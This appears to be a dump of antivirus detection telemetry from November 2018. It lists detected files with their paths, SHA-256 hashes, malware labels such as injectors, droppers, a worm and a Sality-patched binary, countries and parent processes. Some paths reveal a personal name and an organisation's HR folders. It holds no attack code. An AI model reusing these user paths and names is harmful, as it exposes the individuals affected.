  Row(detection=Row(filename='avscan-20181102-052047-06a66ee8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052047-06A66EE8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050944-7b44a124', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050944-7B44A124', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055338-9d5ac767', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055338-9D5AC767', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060057-a302aa89', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060057-A302AA89', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052111-14a774e2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052111-14A774E2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050841-55f71596', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050841-55F71596', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055348-a317fb00', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055348-A317FB00', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052446-94cc6786', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052446-94CC6786', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062030-5deb1c77', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062030-5DEB1C77', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052835-1d485ba5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052835-1D485BA5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054158-fbfed9e1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054158-FBFED9E1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060108-a9756374', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060108-A9756374', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052525-ac1c97a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052525-AC1C97A6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060124-b33aedbd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060124-B33AEDBD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052536-b28e6ff0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052536-B28E6FF0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053827-7e8c31fb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053827-7E8C31FB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7a00b10c55f7d7fdbad4e1bb9da67b5719bde6fa5881d99edce14cde01410757', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\7A00B10C55F7D7FDBAD4E1BB9DA67B5719BDE6FA5881D99EDCE14CDE01410757', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7a00b10c55f7d7fdbad4e1bb9da67b5719bde6fa5881d99edce14cde01410757', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:22:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051436-2992b0c6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051436-2992B0C6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052502-9e40c622', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052502-9E40C622', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='clientantipublic 1.0.4a.exe', filepath='C:\\Users\\X\\Downloads\\ClientAntiPublic 1.0.4a (2)\\ClientAntiPublic 1.0.4a.exe', filesize=2880000, name='TR/Crypt.TPM.Gen.#M300.#R493'), hash='81c889ee3b6c7b687a3d6406c1b5eb8bb7f84195ba1e501f85838a4b6d874e11', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe5_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T06:16:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052516-a6dd7341', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052516-A6DD7341', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053517-0d4fad6f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053517-0D4FAD6F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060626-66c9fc17', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060626-66C9FC17', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062201-9440d28a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062201-9440D28A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051144-c2c171e2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051144-C2C171E2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051421-2099f713', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051421-2099F713', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051129-ba0608e7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051129-BA0608E7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055929-6ec48f0e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055929-6EC48F0E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055238-7979ca93', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055238-7979CA93', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055704-18440060', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055704-18440060', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051758-a1a5ffdb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051758-A1A5FFDB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051228-dd2f00fb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051228-DD2F00FB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053848-8ac1e11e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053848-8AC1E11E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053734-5ec6726d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053734-5EC6726D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060637-6dcee9fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060637-6DCEE9FD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='06700c3435c37b025115cba919d8aff0b59805d69594f21645be7a52aaebf5e7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-20.categorizing\\06700C3435C37B025115CBA919D8AFF0B59805D69594F21645BE7A52AAEBF5E7', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='06700c3435c37b025115cba919d8aff0b59805d69594f21645be7a52aaebf5e7', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T06:54:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154859-7aea9047', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154859-7AEA9047', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:49:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155447-36f3a3de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-155204-205028ED\\AVSCAN-20181101-155447-36F3A3DE', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:13:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:57:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152008-15339713', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-151340-DF30F2CA\\AVSCAN-20181101-152008-15339713', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:38:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2927130\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\sallys-salon_3361492520.exe', parentsize=2418296, timestamp='2018-11-01T10:33:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='joanice aparecida anjos da silva .scr', filepath='C:\\Users\\X\\Desktop\\Joanice Aparecida Anjos da Silva .scr', filesize=320000, name='WORM/Nenebra.A.#M1.#R1'), hash='53a514f013d76540f5daf64de34a640b8a214a9af019a5c257fd562ca7d50ee5', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T16:46:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pengajuan intern.scr', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2016\\RPG\\SURAT PENGAJUAN INTERN\\PENGAJUAN INTERN.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:27:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T00:54:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='30084db8807a5e8a313bb2449496faa258b7df1b9031fb2d7d0a2ef8c9bf5090', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\30084DB8807A5E8A313BB2449496FAA258B7DF1B9031FB2D7D0A2EF8C9BF5090', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='30084db8807a5e8a313bb2449496faa258b7df1b9031fb2d7d0a2ef8c9bf5090', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:51:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-202125-b51f872f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b4863973\\AVSCAN-20181101-195810-E274B34F\\AVSCAN-20181101-202125-B51F872F', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='UY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:21:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T21:08:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-01T14:08:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered nilid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nilid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3acf7c1425fa9fe9629c4cdaf71a882083cd14a828265aa4a0a21ae3f083965b', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T10:13:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-192945-58ad1ead', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ab16be44\\AVSCAN-20181101-184303-2E317741\\AVSCAN-20181101-192945-58AD1EAD', filesize=20000, name='APPL/Linkury.Gen2.#M1.#R1'), hash='47cfc01081109c4b441cc109030378b73fb44f74a87e4c4a12295cea35c1d899', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:29:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setoran knitting.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2017\\RPG GARMENT 2017\\DATA ADMINISTRASI HRD\\SLIP SETORAN KNITTING\\SETORAN KNITTING.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:27:56Z'), dt=datetime.date(2018, 11, 1)),
